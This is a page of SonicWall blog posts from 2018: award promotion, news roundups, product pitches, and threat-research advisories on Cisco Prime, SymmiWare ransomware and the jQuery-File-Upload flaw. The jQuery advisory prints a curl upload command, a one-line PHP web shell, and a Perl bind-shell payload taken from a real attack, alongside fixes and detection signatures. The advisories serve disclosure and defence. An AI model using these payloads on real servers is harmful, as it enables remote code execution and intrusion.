SonicWall’s Steve Pataky Nominated for Channelnomics Innovation Awards 2018, Security Channel Chief of the Year

/0 Comments/in /by

Steve Pataky, Senior Vice President and Chief Revenue Officer at SonicWall, has been nominated for Security Channel Chief of the Year at the Channelnomics Innovation Awards (CIAs) 2018.

The Channelnomics Innovation Awards (CIAs) are designed to recognize channel players across North America who bring innovation, forward thinking and excitement to the channel. Voting is open now and will remain until Friday, Nov. 9, at 5 p.m. EST. There is no limit to the number of times you can vote, so please show your support for Steve now!

VOTE FOR STEVE PATAKY

Why Vote for Steve Pataky?

Steve Pataky is a seasoned channel professional with nearly 30 years of experience architecting and executing global channel and go-to-market strategies, innovative global programs and partner development strategies at scale to generate leverage and partner profitability.

Joining SonicWall in 2016 as Channel Chief and Vice President of worldwide sales Steve launched the SonicWall SecureFirst Partner Program, a vital driving force in growing SonicWall’s partner community, which has surged to over 18,000 channel partners in over 215 countries and territories.

In 2017 Steve spearheaded the introduction of SonicWall University, which boasts over 500 unique courses across three role-based accreditations and has already served over 100,000 hours of training. Upon course completion SecureFirst Partners have been growing POS 21% year/year after training completion and, SecureFirst Registered Partners experiencing a growth of POS 30% year/year after course completion.

Already on the CRN top 100 Executives list for 2018, Pataky has been a persistent channel advocate named as one of the 50 Most Influential Channel Chiefs in 2014, 2015, 2017 and 2018. To SonicWall and its partners, Steve has consistently shown commitment to ensure that SonicWall always puts its partners first when developing strategies and priorities.

As a constant supporter of the idea “100 percent channel, 100 percent security, 100 percent of the time,” Steve embodies what it means to be this year’s Security Channel Chief of the Year.

About the Channelomics Innovation Awards:

Now in its third year, the Channelnomics Innovation Awards (CIAs) are designed to recognize channel players across North America who bring innovation, forward thinking and excitement to the channel.

With over 30 categories to choose from, recognizing achievements for solution providers, distributors and vendors – there’s something for everyone, no matter your role in the channel.

The awards are completely independent and based solely on innovation and achievement in the North American channel over the past year.

Channelnomics is a licensed brand of The 2112 Strategy Group, LLC.

Vote Now

Cast your vote for Steve Pataky before Friday, Nov. 9, at 5 p.m. EST. There is no limit to the number of times you can vote, so please show your support for Steve now!

Vote Now

Critical flaw in the Cisco Prime Infrastructure leads to arbitrary file Upload and command execution

/in /by

Cisco Prime Infrastructure:

Cisco Prime Infrastructure simplifies the management of wireless and wired networks.   This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users – all from one place.

Vulnerability | Arbitrary File Upload and Command Execution:

CVE-2018-15379 – HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions allowing an unauthenticated, remote attacker to upload an arbitrary file. This file can later be executed by the attacker at the privilege level of the user. The vulnerability is due to incorrect permission setting for system directories. An attacker could exploit this vulnerability by uploading a malicious file using TFTP ( Trivial File Transfer Protocol), which can later be accessed via the web-interface. Successful exploitation could result in the execution of arbitrary code in the context of the prime user.

Technical Details:

Most web applications running on the Cisco Prime Infrastructure (CPI)  virtual appliance are deployed under ‘/opt/CSCOlumos/apache-tomcat-<Version>/webapps’. Since the autoDeploy parameter in the Tomcat server.xml for CPI is set to true for the default virtual host, any directory within the “webapps” directory will be deployed as a web application. One of these applications is “swimtemp”, which symlinks to /localdisk/tftp which is where files uploaded by TFTP are located.

rwxrwxrwx. 1 root admin  swimtemp -> /localdisk/tftp/

The TFTP server in Cisco Prime Infrastructure will by default allow uploads and due to the fact that TFTP has no login or access control mechanisms, any user with network connectivity to the TFTP port may upload arbitrary files. Files uploaded via TFTP are placed in the  directory ‘/localdisk/tftp’.

As a result, an attacker can upload a malicious file using a tftp client to the ‘/localdisk/tftp/’ directory. The malicious file will be available at https://<IP>/swimtemp/<web shell>. Attacker can then visit this URI to execute the code in the context of the “prime” user, which is an unprivileged user that runs the Apache Tomcat server.


Affected Products:

Cisco Prime Infrastructure 3.2 and later

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13851 Cisco Prime Infrastructure TFTP Arbitrary File Upload 2Cisco Prime Infrastructure TFTP Arbitrary File Upload 1
  • IPS: 13852 Cisco Prime Infrastructure TFTP Arbitrary File Upload 2Cisco Prime Infrastructure TFTP Arbitrary File Upload 2

SymmiWare Ransomware will only decrypt after Nov 25th

/in /by

The SonicWall Capture Labs Threat Research Team have recently spotted a ransomware trojan calling itself SymmiWare.  There have been other malware named “Symmi” in the past, however, this ransomware does not appear to be related.  SymmiWare is unusual in that the operators are only offering decryption after November 25th 2018.  The supplied email address in the ransom note is not currently active but is expected to be after this date.

Infection Cycle:

The trojan uses the following icon:

Upon running the executable the trojan reports the infection to a remote server:

The trojan encrypts files on the system and appends “.SYMMYWARE” to the file extension of each encrypted file.  It also drops SYMMYWARE.TXT into every directory containing encrypted files.

SYMMYWARE.TXT contains the following text:

 

We tried to contact the operators via simmyware@protonmail.ch but as stated in the above message the address is not yet active:

 

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Symmi.RSM (Trojan)

Cyber Security News & Trends – 11-02-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Channelnomics Innovation Awards – Channelnomics

  • SonicWall’s Steve Pataky is up for Security Channel Chief of the Year, vote for him today!

British Airways Confirms Theft of Additional Data – Silicon (UK)

  • In light of many recent high-profile breaches, SonicWall CEO Bill Conner spoke to Silicon about the responsibility that companies bear when guarding customer data.

2018 ChannelPro SMB All-Stars – ChannelPro

  • SonicWall has been named one of the ChannelPro 2018 SMB All-Stars, an award that honors organizations that do something “truly special” with “significant impact on the SMB channel.”

Cyber Security News

Canada’s Mandatory Breach Notification Rules Now in Effect – Bank Info Security

  • As of Nov. 1, Canadian organizations must record all data breaches, big or small, and report major ones. Records must be kept for at least two years.

Radisson Hotel Group Suffers Data Breach, Customer Info Leaked  – ZDNet

  • Loyalty members of the Radisson Hotel Group have email addresses, phone numbers and more leaked. No financial data is said to be exposed.

White House Sets Deadlines for Agencies to Protect Their Digital Crown Jewels – NextGov

  • Homeland Security has until April 2019 to develop a tool that will map cybersecurity problems in federal agencies following a report in May of this year that found that up to three-quarters of federal agencies were at risk of a breach.

Nice Work if You Can Get It: GandCrab Ransomware Nets Millions Even Though It Has Been Broken – The Register

  • There’s a free decryption tool now available if you’re caught by GandCrab, but in the past 3 months alone the ransomware is still estimated to have netted its owners $300 million.

Mirai Co-Author Gets 6 Months Confinement, $8.6M in Fines for Rutgers Attacks – Krebs On Security

  • The convicted co-author of the Mirai botnet malware has been sentenced to 2,500 hours of community service, six months home confinement and ordered to pay $8.6 million for his use of Mirai in attacks against Rutgers University, New Jersey.

Assault and Battery: Malvertising Campaign Checks User Device’ Charge as Anti-Detection Technique – SC Magazine

  • JuiceChecker-3PC is a clever mobile malware that doesn’t run when a phone battery is low or high in an attempt to avoid detection by security programs that are activated when a phone is charging.

Magecart Claims Fresh Victim in Electronics Kit Seller Kitronik – ZDNet

  • Magecart’s prolific streak continues as electronics outlet Kitronik join British Airways and Ticketmaster in confirming that it has been hit by the malware. Data exposed this time includes complete card details, names and addresses.

In Case You Missed It

Cybersecurity for SMBs: Bundled Network Security Delivers Cost-Effective Protection

/0 Comments/in , /by

If you’re a small- or medium-sized business (SMB), don’t bury your head in the digital sand. Cybercriminals don’t discriminate. Your data, credentials or access could be valuable to them in ways not immediately apparent. SMB cybersecurity is critical.

Unfortunately, SMBs also haven’t received the necessary guidance in terms of government support. That’s alarming since in September 2018 alone, the average SonicWall customer faced 1,662 malware attacks. For the year, SonicWall recorded 8.5 billion malware attacks globally — a 54 percent increase over 2017.

There is good news, however. In August 2018, President Trump signed into law the new NIST Small Business Cybersecurity Act. New legislation in Canada and the UK bring hope for similar protections.

But in many cases, cybersecurity guidance isn’t immediately available. In the U.S., for example, NIST has a year to deliver the guidance (read our eBook to learn more). Regardless of geographic location, a year is a long time for SMBs to wait to either enhance or begin their cybersecurity strategy. For this reason, SonicWall has created cost-effective cybersecurity bundles tailored specifically for SMBs.

Bundled Security for SMBs

The SonicWall TotalSecure SMB Bundle* provides robust cybersecurity technology and services that defend growing SMBs from the volume and sophistication of modern cyberattacks.

The tailored package includes high-performance network security, endpoint protection, cloud sandbox, content filtering, online management and more. Admins can also use powerful reporting functions to easily check the health of the network and endpoints and remediate threats if ever needed.

What’s included What you get
  • Perimeter firewall protection, including SSL traffic inspection
  • Intrusion prevention
  • Content filtering
  • Zero-day defense via Capture ATP with RTDMI
  • Behavior-based endpoint security
  • Endpoint rollback (Windows only)
  • Advanced reporting and attack visualization

Bundled Security for Small Offices

The SonicWall TotalSecure SMB Bundle* also is available for small or home offices. It provides foundational cybersecurity tools that help smaller organizations mitigate cyberattacks from the perimeter to the endpoint.

It’s a comprehensive, out-of-the-box solution to stop cyberattacks, help remediate issues, protect endpoints and manage security — easily and efficiently.

What’s included What you get
  • Perimeter firewall protection, including SSL/TLS traffic inspection
  • Intrusion prevention
  • Content Filtering Service
  • Behavior-based endpoint security
  • Endpoint rollback (Windows only)
  • Advanced reporting and attack visualization

SonicWall has been protecting SMBs for more than 27 years. SonicWall is the No. 2 cybersecurity vendor in the SMB space, according to Gartner’s Market Share: Unified Threat Management (SMB Multifunction Firewalls), Worldwide, 2017 report.

Contact SonicWall to build or enhance your cybersecurity posture for true end-to-end protection from today’s most malicious cyberattacks, including never-before-seen threats.

Lock In Your SMB Bundle

It’s time to use real-time cybersecurity to protect your business from cyberattacks. Contact a SonicWall security expert today. We’re ready to help you build a sound, cost-effective security strategy that’s just right for your business.

CONNECT WITH AN EXPERT

* Please contact SonicWall or your SonicWall SecureFirst partner for regional availability.

jQuery plugin vulnerability actively exploited for few years

/in /by

A widely used jQuery plugin, ‘jQuery-File-Upload’, also called Blueimp contains a critical vulnerability that allows attackers to perform remote code execution. This vulnerability has been in existence for several years and potentially places 7,800 web application forked from this project at risk. Hackers have been actively exploiting this vulnerability but was disclosed only recently. SonicWall Threat Research Lab has researched into this vulnerability to provide protection to our users.

jQuery-File-Upload:

jQuery File upload is a plugin that provides multiple file selection, drag and drop support, progress bar, validation and preview images, audio and video for jQuery. It supports cross-domain, chunked and resumable file uploads. It works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. 
Figure 1: Sample web page implemented using Blueimp jQuery File Upload plugin

Vulnerability | Remote Code Execution: 

CVE-2018-9206  – An arbitrary file upload vulnerability has been reported in the PHP Upload Handler of jQuery File Upload Plugin. This vulnerability is due to lack of sanitization of file types uploaded to an application using the plugin.

The back end PHP code “UploadHandler.php” under server/php/ is used to handle requests from the javascript front end. It doesn’t perform any validation to the upload files to the server. It also doesn’t exclude file types by default. Thus allowing any file types to be uploaded including executable files with .php extensions.

The javascript front end sends POST requests to index.php that in turn loads the UploadHandler class from UploadHandler.php. Files are then written to the server/php/files directory.

A remote attacker can exploit this vulnerability by uploading a crafted PHP file to an application implementing the vulnerable plugin. Successful exploitation could result in the execution of arbitrary code in the context of the user running the web application.

How to Exploit:

In the below sample code, malicious shell code “shell.php” gets uploaded to the server. Later it can be run in the context of the web user.

curl -F “files=@shell.php” http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET[‘cmd’]; system($cmd);?>

As mentioned earlier, this vulnerability has been known to hackers for years. After some digging, we got hold of some real exploits used by attackers few months ago, before the disclosure was made.

 

Figure 2: Traffic captured from the real exploit attempted on 2018-06-03

 

In this exploit, attacker sends POST request to “/themes/dashboard/assets/plugins/jquery-file-upload/server/php” with the upload file “OFWTvRbsmCC.php” to write to the server directory. Content of the malicious php upload file is given below

Shell code within the php is obfuscated using base64 encoding. Decoded base64 text is given below

After decoding further, the deobfuscated final code is retrieved

“$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,17788,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>’” is the metasploit payload to generate the bind shell via perl.

Bind shell is a type of shell in which the attacker opens up a communication port or a listener on the victim machine and makes it wait for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.

Are you affected:

You are affected if you

  • Use jQuery File Upload < v9.24.1 on a Webserver that executes files with .php as part of the file extension (e.g. “example.php.png”)
  • Use jQuery File Upload < v9.22.1 on a Webserver that executes files with the file extension .php
  • Did not configure your Webserver to not execute files in the upload directory (server/php/files).
  • Are running Apache v2.3.9+ with the default AllowOverride Directive set to None or another Webserver with no .htaccess support.support.

Fix:

  • Upgrade to the latest version of jQuery File Upload
  • Configure your web server to not execute files in the upload directory

Refer to vendor advisory:  https://github.com/blueimp/jQuery-File-Upload/blob/master/VULNERABILITIES.md#remote-code-execution-vulnerability-in-the-php-component

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13669 jQuery File Upload Remote Code Execution
  • IPS: 9679 PolarPearCms Remote Code Execution
  • WAF: 1686 jQuery File Upload Remote Code Execution

Cyber Security News & Trends – 10-26-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Privacy Problems for FANG Companies Might Beget M&A Action in Cybersecurity – The Street

  • SonicWall CEO Bill Conner predicts that large tech companies and social media giants will look to mergers and acquisitions (M&A) to address the shortage of available cyber security talent and stave off further punishment and damages caused by breaches and other cyber security incidents.

WSJ Report: Facebook Breach the Work of Spammers, Not Nation-State Actors – Dark Reading

  • Lawrence Pingree offers his perspective on the most recent Facebook breach revelations.

Cyber Security News

Apple CEO Condemns ‘Data-Industrial Complex’ – The Wall Street Journal

  • Apple CEO Tim Cook is calling for new digital privacy laws in the United States to be drawn up, warning that the collection of huge amounts of private and everyday information is being “weaponized against us with military efficiency.”

EU Takes Step Toward Cyberattack Sanctions – Dark Reading

  • The European Union has approved a proposal to place further sanctions on nations proven to have carried out a cyberattack.

Cathay Pacific Says Data of 9.4 Million Passengers Stolen in Hack – The Telegraph (UK)

  • Hong Kong airline Cathay Pacific has suffered a breach affecting up to 9.4 million passengers, including over three quarters of a million passport numbers.

Super Micro to Review Hardware for Malicious Chips – Reuters

  • Super Micro is agreeing to review their hardware in the wake of reports that the Chinese authorities are placing spying chips in their hardware. They deny all the allegations.

Who Is Agent Tesla? – Krebs on Security

  • Openly available for commercial license, Agent Tesla is classified by many as password-stealing malware. Krebs on Security investigates the not-so-well-hidden identity of Agent Tesla’s creator following a 100 percent usage increase of the program in August 2018.

Yahoo to Pay $50M, Other Costs for Massive Security Breach – Associated Press

  • The fallout from the biggest security breach of all time looks to be finally drawing to a close.

Magecart Cybergang Targets 0days in Third-Party Magento Extensions – Threat Post

  • Magecart, the malware behind the Ticketmaster and British Airways breaches, continues to be updated and reconfigured, now targeting unpatched vulnerabilities in third-party plugins used in the Magento e-commerce platform.

In Case You Missed It

EDUCAUSE 2018: SonicWall Heads to Denver

/0 Comments/in /by

The EDUCAUSE Annual Conference hosts the best minds in higher education IT. The event empowers professionals and technology providers from around the world to network, share ideas, grow professionally and discover solutions to solve today’s cybersecurity and IT challenges. And we’re going to be there.

EDUCAUSE 2018

Oct. 30 – Nov. 1

Booth 1003
Colorado Convention Center
Denver, Colo.

REGISTER NOW

Join SonicWall at EDUCAUSE, Oct. 30-Nov. 1, at the Colorado Convention Center in Denver, Colo. Meet SonicWall security experts at Booth 1003, where we are joining long-time partner Dell on the conference floor.

Safeguarding many of the world’s best-known universities, SonicWall empowers security teams with the full breadth of high-performance, scalable security solutions and services that allow educators to realize the promise of tech-savvy learning and research environments.

To demonstrate these capabilities, SonicWall will showcase key solutions to better protect institutions of higher education.

Demo 1: Email Security & Content Protection

SonicWall Email Security, which is available for G Suite and Office 365, helps eliminate email-borne spam, phishing, viruses, spyware and data leaks. It’s also integrated with the SonicWall Capture Advanced Threat Protection (ATP) cloud sandbox to inspect and mitigate malicious attachments and URLs. The demo will feature:

Demo 2: Analytics & Visibility

The SonicWall Capture Security Center helps higher education institutions unify security governance, compliance and risk management. By establishing a holistic, connected approach to security orchestration, Capture Security Center can federate all operational aspects of the SonicWall security ecosystem. It also delivers campus IT admins real-time analytics and risk scores.

Available on SonicWall next-generation firewalls, integrated DPI-SSL technology can decrypt and inspect SSL/TLS traffic for encrypted threats, and Capture ATP delivers AI protection for block-until-verdict mitigation against both known and unknown cyberattacks. The demo will feature:

Event Program Tracks

EDUCAUSE conference content is carefully crafted and curated by institutional and industry presenters. Event discussions are categorized into the following tracks:

Experience EDUCAUSE Online

Can’t make the event in Denver? Experience the conference online with Encore! The EDUCAUSE Annual Conference 2018. The online program features the highest-rated, member-driven content organized across key areas of community interest.

Just like the actual conference, Encore! is tailored for higher ed IT professionals with over 50 presenters, 33 sessions and over 24 hours of session content, including content captured from the featured sessions in Denver.

Resources

Bypassing Government Security Controls with Customized Malware

/0 Comments/in /by

For a moment, think from the perspective of someone who wants to hack a government organization. Think of what they want to do. Seize critical records, encrypt the drive and hold it for ransom? Convert part of a resource into a cryptocurrency mining operation? Or, worse yet, attempt to disrupt or take down critical infrastructure (e.g., utilities, transportation systems, defense)?

As we explore the final theme of National Cybersecurity Awareness Month, “Safeguarding the Nation’s Critical Infrastructure,” I thought it would be valuable to go to a reliable source.

To get a better perspective of threats to critical infrastructure I interviewed a skilled hacker. This is his plan.

Recon & Recode

First, he said he would do reconnaissance on the organization to look for potential vulnerabilities. Makes sense.

But his next step is concerning. He’d take a form of malware he’d used before — or another they find for sale in an exploit kit designed to abuse a vulnerability — and customize it for that specific organization. Customization can be as simple as making a few cosmetic changes to the code or changing the programing to do something slightly different based on previous failed attempts.

This step is important. The new batch of code hasn’t been registered with any firewall vendor, antivirus vendor, security researcher, etc. The targeted organization can’t stop it if their security controls don’t have the ability to conduct behavioral code analysis with zero-day code detonation.

Furthermore, if someone wants to take it to the next level, this code should arrive via an encrypted channel in the hopes they don’t do Man-in-the-Middle (MITM) inspection of HTTPS traffic.  This can be delivered simply over social media or webmail.

Payload Delivery

Now it’s time for everyone’s favorite part: payload delivery. At the time of writing, I am looking at a publicly accessible online sales lead-generation database. At anyone’s fingertips are millions of names and email addresses for contacts at airlines, retailers to higher education. The malicious hacker can easily download 5,886 contacts from a state transportation department or 4,142 from a previously attacked Canadian agency.

If he wants, he could send an infected attachment asking some 526 contacts from a Singapore government agency to open it, or bait 2,839 faceless people at an unnamed health department to click on his malicious link.

Despite awareness training and efforts to keep systems up to date and patched, 11 percent of people will open the attachment according to a Verizon study. Within this population, there will be systems that he can infect and use as a launching point to get his malware to a target system — or at least give him backdoor access or a harvested credential to start working manually.

A hacker selects contacts for a phishing scam against an American county department of education.

How to Defend Against Customized Malware

This method is very similar to what we are seeing happen every day. Customized malware is the main reason why SonicWall discovered and stopped over 56 million new forms of malware in 2017.

In a government organization equipped with SonicWall technology, the email may first be stopped by email security based on the domain or other structures of the message, but you can’t take it for granted.

If the malware is delivered via attachment, SonicWall secure email technology can test the file in the Capture ATP cloud sandbox to understand what the file wants to do. SonicWall Email Security can also leverage Capture ATP to scan malicious URLs embedded in phishing attacks.

To learn more about this technology, read “Inside the Cloud Sandbox: How Capture Advanced Threat Protection (ATP) Works” and review the graphic below.

Protecting Endpoints Beyond the Firewall

But what about employees not behind the firewall? What if the malware is encrypted and the administrator did not activate the ability to inspect encrypted traffic (DPI-SSL)? What about an infected domain that servers fileless malware through an infected ad?

The answer to that is SonicWall Capture Client, a behavior-based endpoint security solution. The traditional antivirus (AV) that comes free with computers (e.g., Norton, TrendMicro, McAfee, etc.) is still around, but they only check files that are known to be malicious.

In an era of customized malware and creative distribution techniques, it is nearly obsolete. This is why government organizations in all countries favor using behavior-based antivirus called a number of things like Endpoint Protection Platforms (EPP) or Next-Generation Antivirus (NGAV).

These forms of AV look at what is happening on the system for malicious behavior, which is great against customized malware, fileless malware and infected USB sticks. NGAV solutions don’t require frequent signature updates and know how to look for bad activity and can shut it down, in many cases, before it executes.

In the case of SonicWall Capture Client, it can not only stop things before they happen, but also roll back Windows systems to a known good state if the endpoint is compromised. This is extremely helpful with ransomware since you can restore encrypted files and continue on as if the infection never happened. Also, like I mentioned above, Capture Client also makes use of Capture ATP in order to find and eliminate malware that is waiting to execute.

Ultimately, by using the SonicWall Capture Cloud Platform, government agencies and offices around the world are protected against the onslaught of new malware, which is often designed to penetrate their systems. For more information on what we do and or conduct a risk-free proof of concept in your environment, please contact us at sales@SonicWall.com or read this solution brief.

About Cybersecurity Awareness Month

The 15th annual National Cybersecurity Awareness Month (NCSAM) highlights user awareness among consumers, students/academia and business. NCSAM 2018 addresses specific challenges and identifies opportunities for behavioral change. It aims to remind everyone that protecting the internet is “Our Shared Responsibility.”

In addition, NCSAM 2018 will shine a spotlight on the critical need to build a strong, cyber secure workforce to help ensure families, communities, businesses and the country’s infrastructure are better protected through four key themes:

  • Oct. 1-5: Make Your Home a Haven for Online Safety
  • Oct. 8-12: Millions of Rewarding Jobs: Educating for a Career in Cybersecurity
  • Oct. 15-19: It’s Everyone’s Job to Ensure Online Safety at Work
  • Oct. 22-26: Safeguarding the Nation’s Critical Infrastructure

Learn more at StaySafeOnline.org.

SonicWall & ConnectWise Simplify Security Management for MSPs

/0 Comments/in /by

When it comes to running a well-organized managed security service business, managed security providers (MSP) demand effective, repeatable processes and continuous operation optimization as a key part of their business strategy.

Evaluating and deciding on a wide-range of important operational capabilities are important to developing and delivering the right services — at the right time and for the right cost. These include choosing the right:

  • Technology partner
  • Staff
  • Data center architecture
  • Contractual terms
  • Service-level delivery
  • Go-to-market strategies
  • Back-office automation tools that power the business

To enable this strategy, MSPs face a myriad of business, economic and technical decisions associated with the infrastructure they’re going to develop and business management software they’re going to employ. Establishing a high-valued managed security service requires a solution that integrates modern security with rich management, monitoring and reporting capabilities with leading professional services automation (PSA) software.

“Establishing a high-valued managed security service requires a solution that integrates modern security with rich management, monitoring and reporting capabilities with leading professional services automation (PSA) software.”

This integration should give MSPs visibility and control of their multi-vendor solution environment and help them streamline business operations and reduce operating costs.

To properly empower MSPs, SonicWall introduces Global Management System (GMS) 8.7, bringing greater visibility, manageability and serviceability of network security solutions via integration with industry-leading professional services automation (PSA) tool ConnectWise Manage® software.

With more than 27,000 SecureFirst global channel partners, the GMS-ConnectWise integration is driven by the collective inputs from many years of partner collaborations. The benefits to MSPs are increased visibility into their customers’ data, improved productivity and better overall efficiency.

The combined solution gives MSPs single-portal experience for automated service ticketing and asset synchronization. MSPs can easily and quickly perform and administer these important operational tasks natively within the ConnectWise Manage portal based on set priority and/or severity level.

So, how does this improve MSP operations? Consider the four ways GMS 8.7 and the ConnectWise integration can simplify security management for your customers.

Company Mapping

MSP partners can share selected clients’ profiles between SonicWall GMS and ConnectWise Manage and map all managed SonicWall firewall assets associated with each client within the ConnectWise portal for management and monitoring.

Auto Asset Synchronization Integration

Automatically update the SonicWall security appliances mapped to a client’s account in the ConnectWise Automate portal for asset tracking and usage. Give visibility to client names and device details, such as model, serial, version, active subscription, enrolled dates, service expirations, IP/MAC address and more.

Asset Synchronization

MSPs also gain visibility into asset inventory inside ConnectWise for easier device management. Whenever a new unit is added, a configuration is created for that unit through ConnectWise and the same is stored in GMS. Reversely, whenever a unit is deleted, the configuration created in ConnectWise is deleted and the same is removed from GMS.

Auto Ticketing Service Integration

Create GMS-generated alerts automatically in the ConnectWise Manage ticketing system. Track, document and communicate all open tickets during the correction process until they are resolved and automatically closed.

Ticketing is mapped between the systems. When they are created in GMS, GMS synchronizes to reflect changes to both systems.

Automated Ticketing

ConnectWise can also send status alerts to the stakeholders using various communication tools until a service ticket is acknowledge or closed. These include email, text messages (SMS), phone calls and even iOS & Android push notifications.

With SonicWall, MSPs are partnering with a technology partner with deep expertise in security technology, operations and processes. Because a vast number of SonicWall partners rely on the ConnectWise Manage for their business-management platform, the GMS-ConnectWise integration is the first of many future product integrations to continue servicing our MSP business requirements.